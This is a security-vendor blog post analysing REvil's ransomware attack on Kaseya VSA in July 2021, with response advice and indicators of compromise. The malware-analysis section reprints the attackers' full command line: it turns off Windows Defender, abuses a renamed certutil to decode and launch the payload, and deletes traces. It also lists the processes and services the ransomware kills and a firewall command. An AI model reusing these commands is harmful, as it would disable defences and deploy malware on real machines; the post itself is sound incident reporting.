Varonis debuts trailblazing features for securing Salesforce. Learn More

Introducing Athena AI our new generative AI layer for the Varonis Data Security Platform.

Learn more

REvil Ransomware Attack on Kaseya VSA: What You Need to Know

6 min read
Last updated October 21, 2021

On July 3rd, at 10:00 AM EST, a malicious hotfix was released and pushed by Kaseya VSA servers that propagated to servers managed by Kaseya, resulting in the compromise and encryption of thousands of nodes at hundreds of different businesses.

This malicious hotfix contained a ransomware payload called Sodinokibi, known to be released by a notorious group called REvil, which resulted in the encryption of the server and shared folders.

Kaseya VSA is a popular piece of software for remote network management, used by many managed security providers, or MSPs, companies that provide IT services to other companies. Network management software is a perfect place to hide a back door because these systems usually have broad access and perform a lot of tasks, making them difficult to monitor.

Unlike the SolarWinds supply chain attack, where the update servers of SolarWinds were compromised, there is no indication that Kaseya’s infrastructure was compromised.

The attackers exploited vulnerable, internet-facing VSA servers commonly running upstream of many victims, in networks of MSPs, using them as backdoors, making it difficult or impossible for the victims to detect or prevent infection as the ransomware flowed “downstream.”

Also, as the updates are typically distributed to many nodes, the recovery for infected organizations may be arduous. The blast radius of a single compromised user or endpoint is usually huge, as the average user typically has access to millions of files they don’t need. The blast radius of administrators or administrative servers is enormous.

Multiple organizations throughout Europe and APAC have been forced to shut down their business entirely while they remediate.

Who is responsible?

REvil, one of the world’s most active ransomware gangs, have updated their blog claiming responsibility. Their payment portal is live and they are actively negotiating with victims.

REvil Kaseya Attack Info

REvil says they have more than a million infected systems, but As of July 6th, roughly 60 of Kaseya’s direct customers appear to have been impacted according to reporting by Bleeping Computer, resulting in about 800 to 1,500 compromised businesses downstream.

Where did the attack start?

It seems that Kaseya VSA servers were vulnerable to a SQL injection attack, allowing the threat actors to remotely exploit them. A CVE was assigned for the vulnerability used: CVE-2021–30116.

Unlike previous attacks by REvil where the dwell time was very long and data was carefully exfiltrated prior to detonating ransomware, this attack appears to have happened very quickly.

It appears that the threat actors knew they were racing against the development of a patch. Security researcher Victor Gevers (@0xDUDE) and the team at disclosed the vulnerability to Kaseya and had been working with them on a patch, but REvil beat them to the punch:

Nicole Perloth on Kaseya ransomware attack

Did REvil know about the pending patch? Were they intercepting communications between the team and Kaseya? These questions remain unanswered presently.


  • If deployed in your organization, immediately turn off and isolate Kaseya’s VSA server.
  • Use the Kaseya detection tool.
  • Review the list of hashes and IPs in the appendix. If observed in any logs, assume breach and initiate incident response processes as soon as possible.
  • If using VSA in your environment, first review step one, and then look for records/alerts on unusual connections access from/by the VSA server or accounts associated w that server.


Based on different sources, the payload was released as part of a hotfix to Kaseya’s customers.

Once published, the hotfix created a folder under the C: drive called kworking, consistent with the behavior of a hotfix.

The folder contained 2 files:

  • agent.txt
  • agent.crt

Once the hotfix has finished writing to disk, it triggers several steps to prepare the machine for infection:

  1. C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
C:\WINDOWS\system32\cmd.exe" /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

This long PowerShell script (executed with high privileges as part of Kaseya’s update process) performs the following steps:

  1. Terminates Windows Defender’s real-time monitoring, network monitoring, folder protections, live script and file scanning, host-based IPS, cloud auto-submission, and turns on audit mode
  2. Decrypts the dropped certificate for the payload to use, utilizing Windows built-in “certutil”
  3. Deletes the artifacts.

Once complete, the payload overwrites the original MsMpEng.exe with an old and outdated version of the legitimate file, that though the executable is “clean,” it has a flaw that allows it to side-load the encryptor (DLL),  calling it to execute as a service and encrypt the machine with higher privileges.


When executed by the malicious ‘MsMpEng.exe’, the payload will enumerate network drives, physical drives, and processes, and begin the encryption process on the server.

The ransomware will whitelist and skip encryption for the following:


  1. *.ps1,*.ldf,*.lock,*.theme,*.msi,*.sys,*.wpx,*.cpl,*.adv,*.msc,*.scr,*.bat,*.key,*.ico,*.dll,*.hta,*.deskthemepack,*.nomedia,*.msu,*.rtp,*.msp,*.idx,*.ani,*.386,*.diagcfg,*.bin,*.mod,*.ics,*.com,*.hlp,*.spl,*.nls,*.cab,*.exe,*.diagpkg,*.icl,*.ocx,*.rom,*.prf,*.themepack,*.msstyles,*.lnk,*.icns,*.mpa,*.drv,*.cur,*.diagcab,*.cmd,*.shs


  1. "ntldr", "thumbs.db", "bootsect.bak", "autorun.inf", "ntuser.dat.log", "boot.ini", "iconcache.db", "bootfont.bin", "ntuser.dat", "ntuser.ini", "desktop.ini"
"ntldr", "thumbs.db", "bootsect.bak", "autorun.inf", "ntuser.dat.log", "boot.ini", "iconcache.db", "bootfont.bin", "ntuser.dat", "ntuser.ini", "desktop.ini"


  1. "program files", "appdata", "mozilla", "$windows.~ws", "application data", "$windows.~bt", "google", "$recycle.bin", "windows.old", "programdata", "system volume information", "program files (x86)", "boot", "tor browser", "windows", "intel", "perflogs", "msocache"
"program files", "appdata", "mozilla", "$windows.~ws", "application data", "$windows.~bt", "google", "$recycle.bin", "windows.old", "programdata", "system volume information", "program files (x86)", "boot", "tor browser", "windows", "intel", "perflogs", "msocache"

In addition, the ransomware will attempt to kill the processes and remove the services:


  1. "encsvc", "powerpnt", "ocssd", "steam", "isqlplussvc", "outlook", "sql", "ocomm", "agntsvc", "mspub", "onenote", "winword", "thebat", "excel", "mydesktopqos", "ocautoupds", "thunderbird", "synctime", "infopath", "mydesktopservice", "firefox", "oracle", "sqbcoreservice", "dbeng50", "tbirdconfig", "msaccess", "visio", "dbsnmp", "wordpad", "xfssvccon"
"encsvc", "powerpnt", "ocssd", "steam", "isqlplussvc", "outlook", "sql", "ocomm", "agntsvc", "mspub", "onenote", "winword", "thebat", "excel", "mydesktopqos", "ocautoupds", "thunderbird", "synctime", "infopath", "mydesktopservice", "firefox", "oracle", "sqbcoreservice", "dbeng50", "tbirdconfig", "msaccess", "visio", "dbsnmp", "wordpad", "xfssvccon"


  1. "veeam", "memtas", "sql", "backup", "vss", "sophos", "svc$", "mepocs"
"veeam", "memtas", "sql", "backup", "vss", "sophos", "svc$", "mepocs"

Based on the “Sodinokibi” config of this campaign, network communications back to the Threat Actors were in fact disabled.

That’s although the config contained 1,223 unique C2 domains, that were not part of the campaign.

Neither worm capabilities (following the “PrintNightmare” exploit leak) nor attempts to “beacon” and communicate with C2 server during the infection process were observed, hints about the goals and priorities of the threat actors.

In general, C2 communications are associated with these sorts of attacks, mainly those that go “low and slow” and/or exfiltrate data as part of “double-extortion” ransomware. This attack, so far, seems more like an encryption-only, single-extortion attack to create maximum impact.

REvil log

We can assume, however, that beaconing took place during the hotfix deployment as part of collecting telemetry with the number of businesses impacted.

Two unique MUTEX’s were observed as part of this campaign:

  • “HKLM\SOFTWARE\Wow6432Node\BlackLivesMatter
  • “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” -> “DefaultPassword”=”DTrump4ever

“BlackLivesMatter” was part of REvil’s Sodinokibi piece, observed in previous campaigns from January 2019, while the second MUTEX is considered new.

In addition, the payload will try to turn off the firewall and enable network discovery using Defender later on as a redundant step (FW and defender are already terminated and disabled):

  1. netsh advfirewall firewall set rule group=”Network Discovery” new enable=Yes


Once all the files on the server are encrypted, the server’s background will be changed:

With a ransom note on both the desktop and “C:\” drive, containing the string to check against the ransom negotiation site (can be seen in the appendix).

Indicators of Compromise

IP addresses

  • 18[.]223[.]199[.]234
  • 161[.]35[.]239[.]148
  • 193[.]204[.]114[.]232

File Hashes (SHA-256)

Mpsvc.dll (MpsVc.dll, MpsVc, mpsvc.dll, MpsVc_.dll):

  • d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
  • d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
  • cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
  • 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd


  • 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e


  • 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8


  • dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f


  • aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7


  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Generic samples, no unique names:

  • e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
  • df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
  • 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
  • 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
  • 45AEBD60E3C4ED8D3285907F5BF6C71B3B60A9BCB7C34E246C20410CF678FC0C


What you should do now

Below are three ways we can help you begin your journey to reducing data risk at your company:

  1. Schedule a demo session with us, where we can show you around, answer your questions, and help you see if Varonis is right for you.
  2. Download our free report and learn the risks associated with SaaS data exposure.
  3. Share this blog post with someone you know who'd enjoy reading it. Share it with them via email, LinkedIn, Reddit, or Facebook.
Try Varonis free.
Get a detailed data risk report based on your company’s data.
Deploys in minutes.
Keep reading
Threat Update 56 – SSO Imposter: Targeting Box
In the final part of the series, Kilian Englert and Ryan O’Boyle from the Varonis Cloud Architecture team walk through how attackers could target Box. They investigate how an attacker…
Threat Update 55 – SSO Imposter: Targeting Google
In part two of this three-part series, Kilian Englert and Ryan O’Boyle from the Varonis Cloud Architecture team investigate how an attacker who compromised a single sign-on admin account can…
Threat Update 54 – SSO Imposter: Intrusion
Virtually every organization leveraging more than a few cloud offerings has a single sign-on solution to simplify the management of their various cloud apps. With a little careful planning, attackers…
Threat Update 53 – ProxyShell and PetitPotam and Ransomware… Oh My!
Technology grows, evolves, and changes over time, but most organizations often need to support legacy systems. In the Microsoft world, this typically means keeping legacy authentication protocols like NTLM authentication…